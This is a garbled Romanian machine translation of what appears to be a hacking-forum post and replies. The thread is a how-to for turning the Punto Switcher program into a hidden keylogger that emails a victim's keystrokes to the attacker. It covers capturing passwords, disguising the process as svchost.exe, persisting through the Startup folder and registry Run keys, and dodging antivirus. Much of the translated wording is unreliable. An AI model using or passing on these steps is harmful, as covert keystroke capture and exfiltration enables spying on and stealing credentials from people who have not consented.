Noi facem keylogger de la switcher punto cu trimiterea de e-mail busteni

keylogger portabil nu dogoritor antivirus care rulează fără drepturi de administrator bazat pe Punto Switcher (denumit în continuare PS) trimiterea jurnal (jurnal) la oficiul poștal.

Și așa avem nevoie de o versiune de PS 3.2.9 sau mai tineri. Îl puteți descărca de pe site-ul oficial cu Yandex. Cu versiuni mai vechi ale 3.2.9 keylogger nu se întâmplă în curs va explica de ce. Deci, avem nevoie de o consolă blat312_32.full.zip client de e-mail. Găsi și descărca numai utilizatorii înregistrați pot vedea posibilă [Link-uri. ]

Crearea unui keylogger va descrie în Windows 7 x86 c implicit activat UAC.

Executați PS de instalare. Scoateți căpușele suplimentare asociate cu instalarea software-ului de la Yandex.


Faceți clic pe Următorul, suntem de acord cu cererea de UAC. La sfârșitul instalării faceți clic pe Finish.

Pictograma din bara de sistem ar trebui să apară PS. Click pe el, faceți clic dreapta și mergeți la setările.

În secțiunea General de pe fila Elemente de bază, îndepărtați toate căpușele.
Pe fila Complex, a pus un control monitorizează clipboard-ul de sistem.
În comenzile rapide de tastatură elimina toate combinațiile cu excepția comenzile rapide de la tastatură pentru setări deschise, cum ar fi Punto Switcher Ctrl + 0.

În normele de comutare, în partea de jos a căpușelor.
Sub problemm Depanarea plasăm bifați ca imaginea de mai jos.

În AutoCorrect elimina toate căpușele.
În Sunete - alege pentru a dezactiva toate.
În Agenda bifate ca în imaginea de mai jos.

Dacă este necesar, pe blog, puteți pune o parolă. Și acum o atenție - în versiuni mai vechi de PS 3.9.2 PS blog nu ține o evidență a două cuvinte scurte și versiunile mai vechi, prin urmare, nu sunt potrivite pentru a intercepta nume de utilizator și parole.

Faceți clic pe OK, PS pictograma dispare din tavă. Pentru a verifica deschis tekstovichek scrie orice combinație de text apasă CTRL + 0, mergeți la secțiunea Jurnal, faceți clic pe Deschidere jurnal și a vedea

Setările noastre keylogger păstra totul execută. Dă-i drumul.

Apoi, creați un copac keylogger folder pe desktop \ Windows \ System32 \ Punto \ AppData Rasspakovyvaem Descărcate anterior blat312_32.full.zip merge la dosarul complet. Fișierele din ea (4 buc.), Creați o copie de pe desktop-ul keylogger \ Windows \ System32. În același diriktorii a crea un fișier batch blat.bat c aici un astfel de cod:

În cazul în care [email protected] și parola este schimbată pe свой_почтовый_ящик@mail.ru și svoy_parol din cutie

În cazul în care „DiaryPS“-corp - antetul mesajului. Puteți fi schimbat la astfel de „CrackLoh“-corp

Dacă utilizați un alt serviciu de e-mail Mail.ru nu schimba serverul mail.ru SMTP pe serviciul server de mail. Eu personal prefer Mail.ru ca interfata sa permite setarea unei parole într-un dosar de mesaje primite și chiar dacă victima găsește un fișier batch cu datele de conectare și parola de e-mail și merge în jos nimic rău nu se va întâmpla.

Toate celelalte valori de comandă nu se va explica, este dincolo de domeniul de aplicare al acestui articol. Ele sunt în căutarea în Google și instrucțiuni Blat'u.

Și acolo (keylogger \ Windows \ System32) sunt crearea unui fișier start.bat lot cu acest cod:

Obiectivul acestui fișier batch kopirovat PS la setările locul potrivit, adăugați un PS la autostart pentru Windows precum și rulați-l.

Cu trecerea la System32 dosarul Punto în ea copia conținutul C: \ Program Files \ Yandex \ Punto Switcher. fișier Punto.exe redenumiți în svchost.exe și se va închide în procesele victimei.

Mai mult, toate în același loc pe desktop merge la keylogger \ Windows \ System32 \ Punto \ AppData acesta a crea un alt dosar copac Microsoft \ Windows \ Start Menu \ Programs \ Startup. Din Startup crea o comandă rapidă la dosar, care va fi amplasat blat.bat C: \ Windows \ System32 \ blat.bat Dar, ca blat.bat în loc încă pentru începători cu crearea etichetei va fi o problemă. Gata pentru a trage eticheta poate doar utilizatorii inregistrati pot vedea arhiva [Link-uri. ].

Scopul acestei etichete să fie în folderul de pornire și de fiecare dată când porniți Windows activați fișierul blat.bat pentru a ne trimite log (blog intrarile de la tastatura), la oficiul poștal. Puteți adăuga un start-up prin registru, dar o astfel de acțiune necesită drepturi de administrator (cerere UAC).

Deci, log (blog) e putem obține prin rularea victimei fereastra C: \ \ System32 \ blat.bat sau de așteptare până când victima se va opri și porniți calculatorul. Pentru a citi diary.dat care va avea nevoie de propria mașină în directorul C: \ Program Files \ Yandex \ Punto Switcher copia fișiere diary.dll și diary.exe în folderul C: \ Users \ utilizator \ AppData \ Roaming \ Yandex \ Punto Switcher \ Datele de utilizator. În cazul în care utilizatorii \ numele de utilizator al mașinii \ numele dvs. de utilizator dumneavoastră. Există, de asemenea, a pus diary.dat și a alerga diary.exe ..

Pentru cei care folosesc sacrificii pentru Windows XP, în principiu, la fel ca și pentru Grupul celor șapte sunt doar câteva diferențe.

Pentru XP dosar keylogger \ Windows \ System32 fișier batch start.bat este creat cu următorul conținut:

În keylogger folderul \ Windows \ System32 \ Punto crea AppData și AppData2
Din C: \ Users \ utilizator \ AppData \ Roaming AppData dosar pentru a copia dosarul Yandex
În dosarul AppData2 Creați un copac dosar Start Menu \ Programs \ Startup (română pentru versiunile de Windows) și puneți-l în comanda rapidă de pornire pe blat.bat

Pentru a elimina keylogger din procesul mașinii victima să-l omoare și executați fișierul batch cu acest cod:

@echo off
@chcp 1251
@del / s / q "% systemroot% \ system32 \ blat.bat"
@del / s / q "% systemroot% \ system32 \ blat.dll"
@del / s / q "% systemroot% \ system32 \ blat.exe"
@del / s / q "% systemroot% \ system32 \ blat.lib"
@del / s / q "% systemroot% \ system32 \ blatdll.h"
@del / s / q "% systemroot% \ system32 \ start.bat"
@rmdir / s / q "Start Menu \ Programs \ Startup"
@rmdir / s / q "Microsoft \ Windows \ Start Menu \ Programs \ Startup"
@rmdir / s / q "% APPDATA% \ Yandex"
@rmdir / s / q "% systemroot% \ system32 \ Punto"

Dacă există o greșeală în subiectul e-mailului. Vom intelege corect.

Acum, există o problemă cu trimiterea unui jurnal, încercați să câștige.

Adăugarea:
1. Citat:
Postat de Colonial0
Mai mult, toate în același loc pe desktop merge la keylogger \ Windows \ System32 \ Punto \ AppData acesta a crea un alt dosar copac Microsoft \ Windows \ Start Menu \ Programs \ Startup

Calea către cele șapte arata ca: \ AppData \ Roaming \ Microsoft \ Windows \ Start Menu \ Programs \ Startup. Roamng dosar uitat? Chiar acum, am verifica afară.

Am verificat. Când porniți start.bat 7 fișiere au fost copiate, utilizate copia doar 6. Deși unele progrese este încă nici o stabilitate. După suprasarcină este încă nici jurnalele de referință. Comandă rapidă adăugată la pornire, nu, nu doar în folderul de pornire. Într-adevăr face manual? A și încercați.
Gata!

Prea incriminatoare. Puteți face acest lucru, dar încă strâmb, doresc mai mult.

Acesta poate fi în registru?

Notepad deschis, scrie:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ Curr entVersion \ Run]
"Blat" = "C: \\ Ferestre \\ \\ System32 blat.bat"
"Punto" = "C: \\ Ferestre \\ system32 \\ \\ Punto .exe svchost"

Scoateți vechi de pornire etichete.

Reboot.
Incriminarea comenzi rapide în pornire nu. Punto rula. CMD a apărut pentru a umple ecranul și arată procesul de trimitere busteni

Aproape de ceea ce poate nahononado trimiterea de pe săpun?

VERDICT :. Atunci când există acces la un computer - puteți face fără a trimite jurnalele (în cazul în care accesul de la distanță - în cele din urmă nu se poate elibera fișier jurnal copie Pentru a instala un utilizator simplu nu este necesar, ci ca o opțiune atunci când instalarea de operare bezpalevnoy AntiVir - se potrivesc.

PS Webmaster, editarea textului trebuie să copiați-paste caseta de mesaje de editare este gol. Nu este foarte convenabil, există o tentație narkutit posturi)))

Adăugat după 5 ore și 15 minute


Citat:
Postat de Colonial0
Și acolo (keylogger \ Windows \ System32) sunt crearea unui fișier start.bat lot cu acest cod:

Obiectivul acestui fișier batch kopirovat PS la setările locul potrivit, adăugați un PS la autostart pentru Windows precum și rulați-l.

În cazul în care linia este responsabilă de pornire aici? . Ahhh. Se pare prins în dosarul AppData.